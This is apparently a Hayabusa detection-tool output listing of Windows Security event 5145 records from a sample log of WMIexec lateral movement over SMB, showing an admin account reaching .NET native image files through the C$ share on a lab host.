10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# : IP Address: 